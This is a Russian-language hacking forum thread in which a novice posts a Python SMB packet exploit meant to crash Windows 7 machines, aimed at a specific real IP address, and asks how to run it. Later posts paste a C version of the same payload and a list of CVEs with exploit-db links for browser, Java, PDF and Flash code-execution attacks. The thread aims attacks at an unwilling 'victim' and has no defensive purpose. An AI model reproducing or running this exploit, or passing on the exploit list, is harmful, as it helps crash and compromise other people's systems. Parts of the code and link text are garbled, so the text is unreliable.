![]() |
Добрый день !
Я новичок в плане взлома да и вобще ) Мне конечно очень понравилась программа Metasploit framework, но всех эксплоитов которые там находятся, не совсем хватает, по этому я порылся в гугле и т.д. в итоге нашел эксплоит для ОС windows 7 его содержание такое : from socket import socket host = "92.54.70.230", 445 buff = ( "\x00\x00\x00\x90" # Begin SMB header: Session message "\xff\x53\x4d\x42" # Server Component: SMB "\x72\x00\x00\x00" # Negociate Protocol "\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853 "\x00\x26"# Process ID High: --> normal value should be "\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\ xff\xfe" "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\ x45\x54" "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\ x20\x31" "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\ x30\x00" "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\ x20\x57" "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\ x31\x61" "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\ x02\x4c" "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\ x20\x4c" "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\ x32\x2e" "\x30\x30\x32\x00" ) s = socket() s.connect(host) s.send(buff) s.close() я так понимаю он написан на python ... пытаюсь запустить с консоли и вот что получаю : from: can't read /var/mail/socket host: couldn't get address for '92.54.70.230,': not found /home/blood/1st.py: строка 4: ошибка синтаксиса около неожиданной лексемы `(' /home/blood/1st.py: строка 4: `buff = (' ладно ... дальше пробую запустить сначала python и потом из него мой файл : Python 2.6.6 (r266:84292, Sep 15 2010, 15:52:39) [GCC 4.4.5] on linux2 Type "help", "copyright", "credits" or "license" for more information. >>> '/home/blood/1st.py' >>> и ничего подскажете пожалуйста как мне быть?? что бы я мог использовать сторонние эксплоиты ... Зарание благодарен... |
Я не спец конечно, но может надо Python 3k?
Просто предположение |
Цитата:
|
По идее на компе жертвы появится BSOD , но пинг показывает что живой , спасибо usr-bin,
я теперь хотя бы знаю чем юзать подобные сплойты ... |
Но как быть с этим ???
[COLOR="Green"]char buff[] = "\x00\x00\x00\x90" "\xff\x53\x4d\x42" "\x72\x00\x00\x00" "\x00\x18\x53\xc8" "\x00\x26" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\ x ff\xfe" "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\ x 45\x54" "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\ x 20\x31" "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\ x 30\x00" "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\ x 20\x57" "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\ x 31\x61" "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\ x 02\x4c" "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\ x 20\x4c" "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\ x 32\x2e" "\x30\x30\x32\x00"; int main(int argc, char *argv[]) { if (argc >> >>> '/home/blood/1st.py' '/home/blood/1st.py' >>> |
Так это вообще код на С++. Ты что, его через Питон "пропускаешь"?
Их можно запускать через программу lcc.exe. Почитай тему /thread26510.html |
кому надо
[B] MDAC CVE-2006-0003 https: //www.exploit-...exploits/16561/Microsoft Internet Explorer - COM CreateObject выполнение кода PDF CVE-2010-0188 https: // WWW .exploit -... эксплойты / 16670 /Adobe Acrobat Bundled LibTIFF переполнением целочисленного Java CVE-2011-3544 по протоколу HTTPS: //www.exploit-...exploits/18171/Java Applet Rhino Script Engine Удаленное выполнение кода FF CVE-2012- 1710 * Mozilla Firefox использовать против плагинов уязвимости Oracle Java CVE-2012-0507 https: //www.exploit-...exploits/18679/Java AtomicReferenceArray Тип Нарушение Уязвимость IE CVE-2013-0074 по протоколу HTTPS: //www.exploit- ... подвигах / 29858 /Microsoft Internet Explorer - COALineDashStyleArray небезопасный доступ к памяти (MS12-022) IE CVE-2013-0322 https: //www.exploit-...exploits/32904/Microsoft Internet Explorer - CMarkup Use-вечернюю Free (MS14-012) IE CVE-2013-1347 https: //www.exploit-...exploits/25294/Microsoft Internet Explorer CGenericElement Объект Use-After-Free уязвимости Java CVE-2013-1493 https: // WWW. эксплуатируют -... эксплойты / 24904 /Java CMM удаленное выполнение кода Java CVE-2013-2423 https: //www.exploit-...exploits/24976/Java Applet Отражение Тип Путаница удаленное выполнение кода JRE CVE-2013-2465 по протоколу HTTPS : //www.exploit-...exploits/27705/удаленное выполнение кода уязвимости в Oracle JRE IE CVE-2013-2551 https: //www.exploit-...exploits/26175/Microsoft Internet Explorer - COALineDashStyleArray Целочисленное переполнение ( MS13-009) FF CVE-2013-3993 * Mozilla Firefox использовать против плагинов уязвимости IBM Flash - CVE-2014-0497 https: //www.exploit-...exploits/33212/Adobe Flash Player Integer Underflow удаленное выполнение кода IE CVE -2014-6332 https: //www.exploit-...exploits/35229/Microsoft Internet Explorer |
| Время: 13:25 |